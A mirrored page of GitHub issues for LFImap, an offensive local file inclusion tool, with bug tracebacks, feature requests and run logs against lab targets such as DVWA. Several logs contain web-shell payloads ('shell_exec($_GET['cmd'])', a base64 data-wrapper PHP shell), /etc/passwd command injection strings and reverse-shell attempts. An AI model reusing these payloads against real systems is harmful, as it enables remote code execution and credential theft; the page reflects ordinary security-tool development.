hansmach1ne / lfimap Goto Github PK
View Code? Open in Web Editor NEWLocal File Inclusion discovery and exploitation tool
License: Apache License 2.0
lfimap's Issues
AttributeError: 'Namespace' object has no attribute 'is_tested_param_post'
└─# python3.9 lfimap.py --all -F /WhiteyCookie/Github/ParamSpider/paramspider/results/redacted.com.txt -v
[i] Session information is not provided. LFImap might have troubles finding vulnerabilities if testing endpoint requires authentication.
[i] Parsing URL [1/279]: 'https://www.redacted.com/path/to/news?cHash=PWN'
[i] Preparing to test GET 'cHash' parameter...
[i] Preparing to test misc issues using heuristics...
[.] Testing for XSS...
[.] Testing for CRLF...
[.] Testing for error-based info leak...
[.] Testing for open redirect...
[i] Testing with filter wrapper...
[i] Testing with input wrapper...
Traceback (most recent call last):
File "/WhiteyCookie/Github/LFImap/lfimap.py", line 375, in
main()
File "/WhiteyCookie/Github/LFImap/lfimap.py", line 111, in main
test_input(url, "")
File "/WhiteyCookie/Github/LFImap/src/attacks/input.py", line 16, in test_input
if(args.is_tested_param_post):
AttributeError: 'Namespace' object has no attribute 'is_tested_param_post'
TODO: Try including different files
The issue is that /etc/passwd might be blocked by waf, so try to include modality that will use 'silent' payloads and include different files to confirm the vulnerability.
Also Java tends to not allow path traversal outside the web root, so implement something like /WEB-INF/web.xml or alike method of discovery...
TODO: CSRF token handling /support
Implement automatic token refresh for requests.
Lack of `timeout` in requests calls
There is lack of timeouts in the requests calls I have added them in a PR:
#67
TypeError: get_params_with_param() takes 1 positional argument but 2 were given
└─# python3.9 lfimap.py --t -F /WhiteyCookie/Github/ParamSpider/paramspider/results/redacted.com.txt --use-long -v
[i] Session information is not provided. LFImap might have troubles finding vulnerabilities if testing endpoint requires authentication.
[i] Parsing URL [1/279]: 'https://www.redacted.com/path/to/news?cHash=PWN'
[i] Preparing to test GET 'cHash' parameter...
[i] Testing path truncation using '/WhiteyCookie/Github/LFImap/src/wordlists/long.txt' wordlist...
Traceback (most recent call last):
File "/WhiteyCookie/Github/LFImap/lfimap.py", line 375, in
main()
File "/WhiteyCookie/Github/LFImap/lfimap.py", line 164, in main
print(colors.red("[-]") + " GET parameter '" + get_params_with_param(url, args.param) + "' doesn't seem to be vulnerable.\n")
TypeError: get_params_with_param() takes 1 positional argument but 2 were given
AttributeError
all requirements are installed but there is a problem with the tool
TODO: pip package
Create easy pip install module.
Detected by antivirus
whoami :)
Cannot init pip package bad main() call logic -> from lfimap import main
└─$ python3
Python 3.11.6 (main, Oct 8 2023, 05:06:43) [GCC 13.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from lfimap import main
>>> main()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/home/kali/Desktop/leet_toolz/LFImap/lfimap.py", line 264, in main
if args['param'] in config.url:
^^^^^^^^^^
AttributeError: module 'src.configs.config' has no attribute 'url'. Did you mean: 'urls'?
Issue background:
When running python3 lfimap.py -h, interpreter looks for if(__name__ == "__main__") and enter this block, however once the program is imported as a module and main() is called (like pip configuration does/requires), it will error out, because checkArgs is not called at all in that case:
# Check command-line arguments
if not checkArgs():
sys.exit(-1)
how can fix this issue ?
lfimap.py: error: unrecognized arguments: --url http://testphp.vulnweb.com/showimage.php?file=PWN
Circular dependency in code
There seems to be a circular dependency in the code that makes it impossible to load a module directly without the "main.py" code
This makes writing tests (pytest) impossible and probably affects also the stability of the code (debugging fails to properly jump to the right place due to this), the circular dependency can bee seen in:
from src.attacks.pwn import pwn
src/attacks/pwn.py:2: in <module>
from src.attacks.bash import exploit_bash
src/attacks/bash.py:1: in <module>
from src.httpreqs import request
src/httpreqs/request.py:5: in <module>
from src.attacks.pwn import pwn
E ImportError: cannot import name 'pwn' from partially initialized module 'src.attacks.pwn' (most likely due to a circular import) (src/LFImap/src/attacks/pwn.py)
Its not limited to the pwn module importing, rather to anything that imports pwn in some code flow
I think it is a good idea to preform code cleanup so that this doesn't happen
'black' linter
The code currently is written with somewhat weird tabbing/ missing of string concating, ' instead of ", may I recommend using black to just look more readable?
Here is a PR that will show you the difference (I just ran 'black' on the root folder)
#53
Missing files causing false negative
The rfi.py refers to these URLs:
pylds.append(
"https%3A%2F%2Fgithub.com%2Fhansmach1ne%2FLFImap%2Fblob%2Fmain%2Fsrc%2Fexploits%2Fexploit.php"
)
pylds.append(
"https%3A%2F%2Fgithub.com%2Fhansmach1ne%2FLFImap%2Fblob%2Fmain%2Fsrc%2Fexploits%2Fexploit.jsp"
)
pylds.append(
"https%3A%2F%2Fgithub.com%2Fhansmach1ne%2FLFImap%2Fblob%2Fmain%2Fsrc%2Fexploits%2Fexploit.html"
)
pylds.append(
"https%3A%2F%2Fgithub.com%2Fhansmach1ne%2FLFImap%2Fblob%2Fmain%2Fsrc%2Fexploits%2Fexploit.gif"
)
pylds.append(
"https%3A%2F%2Fgithub.com%2Fhansmach1ne%2FLFImap%2Fblob%2Fmain%2Fsrc%2Fexploits%2Fexploit.png"
)
Which decode results in:
pylds.append(
"https://github.com/hansmach1ne/LFImap/blob/main/src/exploits/exploit.php"
)
pylds.append(
"https://github.com/hansmach1ne/LFImap/blob/main/src/exploits/exploit.jsp"
)
pylds.append(
"https://github.com/hansmach1ne/LFImap/blob/main/src/exploits/exploit.html"
)
pylds.append(
"https://github.com/hansmach1ne/LFImap/blob/main/src/exploits/exploit.gif"
)
pylds.append(
"https://github.com/hansmach1ne/LFImap/blob/main/src/exploits/exploit.png"
)
None of these URLs exist :(
Is this intentional? looks like a mishap
Attribute Error
Hello, thank you for your project, it seems very promising.
I get the following error while trying to run it.
C:\tools\LFImap>python lfimap.py -U "http://testphp.vulnweb.com/showimage.php?file=php://filter/convert.base64-encode/resource=showimage.php" -C "asdasd" -a
Traceback (most recent call last):
File "C:\tools\LFImap\lfimap.py", line 1799, in <module>
main()
File "C:\tools\LFImap\lfimap.py", line 1442, in main
r,_ = REQUEST(url, headers, postTest, proxies, "test", "test")
File "C:\tools\LFImap\lfimap.py", line 255, in REQUEST
if(tOut is not None): res = requests.request(args.method, url, data=postData.encode("utf-8"), headers=headersData, proxies=proxy, verify=False, timeout=tOut)
File "C:\Python310\lib\site-packages\requests\api.py", line 59, in request
return session.request(method=method, url=url, **kwargs)
File "C:\Python310\lib\site-packages\requests\sessions.py", line 562, in request
method=method.upper(),
AttributeError: 'NoneType' object has no attribute 'upper'
I am using Python 3.10.6.
Any idea?
Unhandled Exception when command injection is possible + '-x' for reverse shell
└─$ python3 lfimap.py -U "http://10.10.200.85/vulnerabilities/exec/#" -D "ip=a&Submit=submit" -C "PHPSESSID=4827vaidcjprtcen3l7aoes9p0; security=low" -a -v --lhost 10.8.164.25 --lport 99 -x
[i] Testing form-line 'ip' parameter...
[i] Testing misc issues using heuristics...
[i] Testing for XSS...
[i] Testing for CRLF...
[i] Testing for error-based info leak...
[i] Testing for open redirect...
[i] Testing with filter wrapper...
[i] Testing with input wrapper...
[i] Testing with data wrapper...
[i] Testing with expect wrapper...
[i] Testing with file wrapper...
[i] Testing remote file inclusion...
[i] Opening temporary local web server on port 8000 and hosting $LFIMAP_DIR/src/exploits that will be used for test inclusion
[i] Trying to include internet-hosted file...
[i] Testing path truncation using '/home/kali/Desktop/leet_toolz/LFImap/src/wordlists/short.txt' wordlist...
[i] Testing results-based OS command injection...
[+] RCE -> 'http://10.10.200.85/vulnerabilities/exec/#' -> HTTP POST -> 'ip=1%3Bcat%24%7BIFS%7D%2Fetc%2Fpasswd%3B%23%24%7BIFS%7D%27%3Bcat%24%7BIFS%7D%2Fetc%2Fpasswd%3B%23%24%7BIFS%7D%5C%22%3Bcat%24%7BIFS%7D%2Fetc%2Fpasswd%3B%23%24%7BIFS%7D&Submit=submit'
[?] Checking if bash is available on the target system...
[*] Starting reverse listener on 0.0.0.0:99
[.] Trying to pop reverse shell to 10.8.164.25:99 using bash via command injection...
[-] Previous request caused uncaught exception. Try proxying requests to see exactly what happened
Traceback (most recent call last):
File "/home/kali/Desktop/leet_toolz/LFImap/lfimap.py", line 477, in <module>
main()
File "/home/kali/Desktop/leet_toolz/LFImap/lfimap.py", line 404, in main
test_cmd_injection(url, post)
File "/home/kali/Desktop/leet_toolz/LFImap/src/attacks/cmdi.py", line 54, in test_cmd_injection
r, br = REQUEST(u, reqHeaders, postTest, proxies, "RCE", "CMD")
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/kali/Desktop/leet_toolz/LFImap/src/httpreqs/request.py", line 221, in REQUEST
if(init(res, "", exploitType, url, postData, headersData, exploitMethod)):
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/kali/Desktop/leet_toolz/LFImap/src/httpreqs/request.py", line 106, in init
pwn(exploit)
File "/home/kali/Desktop/leet_toolz/LFImap/src/attacks/pwn.py", line 72, in pwn
exploit_bash(exploit, "CMD", ip, port)
File "/home/kali/Desktop/leet_toolz/LFImap/src/attacks/bash.py", line 79, in exploit_bash
request.REQUEST(url, args.httpheaders, post.replace(config.tempArg, encode(bashPayloadStageOne)), post, config.proxies, "", "", exploit = True)
TypeError: REQUEST() got multiple values for argument 'exploit'
TODO: second order vulnerability detection/support
Ability to detect second order LFI/LFR, stored xss
Output of script not being saved to file or piped
Hi, I am trying to save the output of the script, for example like this:
python3 LFImap/lfimap.py -U "http://localhost/vulnerabilities/fi/?page=include.php" -C "..." -a > fi.txt
Or by using subprocess.Popen and then using iter to get the output, but id does not print anything.
Also tryed with subprocess.run and capture_output, and printing it at the end... Still nothing.
Am I doing something wrong?
When 404 code is expected response, LFImap just stops. Testing request fails to notice alive endpoint.
└─$ python3 lfimap.py -U "https://mach1ne.org/a/PWN"
[-] Something unexpected has happened, initial testing response is not clearly received. Please check your switches and url endpoint(s). Exiting...
-R doesn't accept unicode character
Problematic if user wants to test for example specific part of the request that contains binary data
Implement default .gitignore
Can we use this default .gitignore file?
https://github.com/github/gitignore/blob/main/Python.gitignore
It will help git ignore venv/ and __pycache__ and similar
Move global `args` to a class/object/non-global
At the moment the constant calling to:
from src.utils.arguments import args
Is causing the code to have complexity that makes it impossible to:
- Write additional code without causing a dependency issue (this is visible when debugging/running unit-tests)
- Warnings shown when
argsis accessed as it doesn't know which arguments exist/don't exist - No type checking when accessing the variables stored inside args
- Multiple times
args = parser.parse_args()code is called and parameters areinit
I suggest to move the arguments.py code so that is not all sitting in the 'global' rather inside a class, init once when the code starts, stores the variables inside a dict rather than args or inside self values of this class, pass this newly created class around to whoever needs it or still use it as a global (but prevent its init from being called on every import)
RCE false positive when parameter is vulnerable to XSS
└─$ python3 lfimap.py -U "http://192.168.56.104/dvwa/vulnerabilities/xss_r/?name=aa#" -C "security=low; PHPSESSID=fd6582cc1b2843b479965f570419b6de" --lhost 192.168.56.113 --lport 99 -r -P "127.0.0.1:8080" -d -heur
[i] Testing GET 'name' parameter...
[+] XSS -> 'http://192.168.56.104/dvwa/vulnerabilities/xss_r/?name=mns%3A817%3Ew%3Cgf%3B93%22%27rq' -> full reflection in response
Content-Type: text/html;charset=utf-8
[+] RCE -> 'http://192.168.56.104/dvwa/vulnerabilities/xss_r/?name=data%3A%2F%2Ftext%2Fplain%3Bbase64%2CPD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOz8%2B&c=cat%20%2Fetc%2Fpasswd'
----------------------------------------
LFImap finished with execution.
Parameters tested: 1
Requests sent: 16
Vulnerabilities found: 2
Multiple fixes to `src/utils/parseurl.py`
TODO: JSON POST parameter parsing support
Add support for endpoints that use JSON as the Content-Type.
This is partially supported now, by using placeholder PWN as the injection point, however parameters won't be parsed and tested 1 by 1 automatically.
-x no longer works
Tried to initiate a reverse shell and this is the output i get:
python3 lfimap.py -U "http://localhost/vulnerabilities/fi/?page=include.php" -C "PHPSESSID=pee4sgbjm74s57o43h39vevqo0; security=low" -a --lhost 192.168.65.3 --lport 3001 -x -v
[i] Testing GET 'page' parameter...
[i] Testing misc issues using heuristics...
[i] Testing for XSS...
[i] Testing for CRLF...
[i] Testing for error-based info leak...
[i] Testing for open redirect...
[i] Testing with filter wrapper...
[+] LFI -> 'http://localhost/vulnerabilities/fi/?page=php%3A%2F%2Ffilter%2Fresource%3D%2Fetc%2Fpasswd'
[i] Testing with input wrapper...
[+] RCE -> 'http://localhost/vulnerabilities/fi/?page=php%3a%2f%2finput&cmd=cat%20%2Fetc%2Fpasswd' -> HTTP POST -> '<?php echo(shell_exec($_GET['cmd']));?>'
[-] Previous request caused uncaught exception. Try proxying requests to see exactly what happened
Traceback (most recent call last):
File "/home/rares/Licenta/license/attack_scan_system/tool_repos/LFImap/lfimap.py", line 769, in <module>
main()
File "/home/rares/Licenta/license/attack_scan_system/tool_repos/LFImap/lfimap.py", line 642, in main
test_input(url, post)
File "/home/rares/Licenta/license/attack_scan_system/tool_repos/LFImap/src/attacks/input.py", line 57, in test_input
_, br = REQUEST(u, reqHeaders, post, proxies, "RCE", "INPUT")
File "/home/rares/Licenta/license/attack_scan_system/tool_repos/LFImap/src/httpreqs/request.py", line 359, in REQUEST
if init(res, "", exploitType, url, postData, headersData, exploitMethod):
File "/home/rares/Licenta/license/attack_scan_system/tool_repos/LFImap/src/httpreqs/request.py", line 148, in init
pwn(exploit)
NameError: name 'pwn' is not defined
'-t' RCE modules are not initialized at all
pwn() is not called when '-t' module finds the vulnerability
TODO: Revise all exploitation modules
Implement ability to RCE with reverse shell for all attack techniques in case of a true positive
Not clear instructions
Not clear how to use long.txt wordlist instead of short.txt, can you add it to instructions?
Also need some bypass techniques for waf like urlencode
Add newest User-Agents to possibly avoid detection
Suggestion from @nrathaus.
Bug: uncaught exception -- args.method is None
The args.method is undefined if -M is not specified and the placeholder (--placeholder, args.param) is not part of the URL. This causes the application to crash.
The issue lies in the following lines:
Lines 1623 to 1632 in 436ea01
One possible solution would be setting default method in the optionsGroup.add_argument call or rewriting the code in this fashion:
if (args.url and args.param in args.url): args.method = "GET" Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.